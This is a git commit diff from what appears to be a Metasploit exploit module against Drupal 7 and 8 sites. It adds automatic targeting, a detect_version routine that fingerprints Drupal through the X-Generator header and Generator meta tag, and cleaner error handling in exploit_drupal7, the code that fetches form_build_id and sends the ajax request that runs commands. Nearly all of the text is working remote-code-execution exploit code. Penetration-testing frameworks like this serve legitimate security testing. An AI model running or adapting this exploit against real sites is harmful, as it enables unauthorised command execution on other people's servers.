Add version detection and automatic targeting
I also refactored error handling. Should be cleaner now.GSoC/Meterpreter_Web_Console
parent
86ffbc753e
commit
3d116d721d
|
@ -44,6 +44,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Privileged' => false,
|
||||
# XXX: Using "x" in Gem::Version::new isn't technically appropriate
|
||||
'Targets' => [
|
||||
['Automatic (Unix In-Memory)',
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD
|
||||
],
|
||||
['Automatic (Linux Dropper)',
|
||||
'Platform' => 'linux',
|
||||
'Arch' => [ARCH_X86, ARCH_X64]
|
||||
],
|
||||
['Drupal 7.x (Unix In-Memory)',
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
|
@ -65,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Version' => Gem::Version.new('8.x')
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 2, # Drupal 8.x (Unix In-Memory)
|
||||
'DefaultTarget' => 0, # Automatic (Unix In-Memory)
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'cmd/unix/generic',
|
||||
'CMD' => 'id; uname -a'
|
||||
|
@ -113,6 +121,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
vprint_status("Executing with #{func}(): #{cmd}")
|
||||
|
||||
res = case target['Version'].to_s
|
||||
when '' # Automatic
|
||||
case detect_version.to_s
|
||||
when '7.x'
|
||||
print_good('Drupal 7 detected')
|
||||
exploit_drupal7(func, cmd)
|
||||
when '8.x'
|
||||
print_good('Drupal 8 detected')
|
||||
exploit_drupal8(func, cmd)
|
||||
end
|
||||
when '7.x'
|
||||
exploit_drupal7(func, cmd)
|
||||
when '8.x'
|
||||
|
@ -120,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
unless res && res.code == 200
|
||||
vprint_error("Unexpected final reply: #{res.inspect}")
|
||||
print_error("Unexpected reply: #{res.inspect}")
|
||||
return
|
||||
end
|
||||
|
||||
|
@ -129,6 +146,35 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
res
|
||||
end
|
||||
|
||||
def detect_version
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => target_uri.path
|
||||
)
|
||||
|
||||
return res unless res && res.code == 200
|
||||
|
||||
case res.headers['X-Generator']
|
||||
when /Drupal 7/
|
||||
return Gem::Version.new('7.x')
|
||||
when /Drupal 8/
|
||||
return Gem::Version.new('8.x')
|
||||
end
|
||||
|
||||
generator = res.get_html_document.at(
|
||||
'//meta[@name = "Generator"]/@content'
|
||||
)
|
||||
|
||||
return res unless generator
|
||||
|
||||
case generator.value
|
||||
when /Drupal 7/
|
||||
Gem::Version.new('7.x')
|
||||
when /Drupal 8/
|
||||
Gem::Version.new('8.x')
|
||||
end
|
||||
end
|
||||
|
||||
def exploit_drupal7(func, code)
|
||||
vars_get = {
|
||||
'q' => 'user/password',
|
||||
|
@ -149,28 +195,20 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'vars_post' => vars_post
|
||||
)
|
||||
|
||||
unless res && res.code == 200
|
||||
vprint_error("Unexpected intermediate reply: #{res.inspect}")
|
||||
return
|
||||
end
|
||||
return res unless res && res.code == 200
|
||||
|
||||
form_build_id = res.get_html_document.at(
|
||||
'//input[@name = "form_build_id"]/@value'
|
||||
)
|
||||
|
||||
if form_build_id
|
||||
form_build_id = form_build_id.value
|
||||
else
|
||||
vprint_error("Unknown form_build_id: #{res.inspect}")
|
||||
return
|
||||
end
|
||||
return res unless form_build_id
|
||||
|
||||
vars_get = {
|
||||
'q' => "file/ajax/name/#value/#{form_build_id}"
|
||||
'q' => "file/ajax/name/#value/#{form_build_id.value}"
|
||||
}
|
||||
|
||||
vars_post = {
|
||||
'form_build_id' => form_build_id
|
||||
'form_build_id' => form_build_id.value
|
||||
}
|
||||
|
||||
send_request_cgi(
|
||||
|
|
Loading…
Reference in New Issue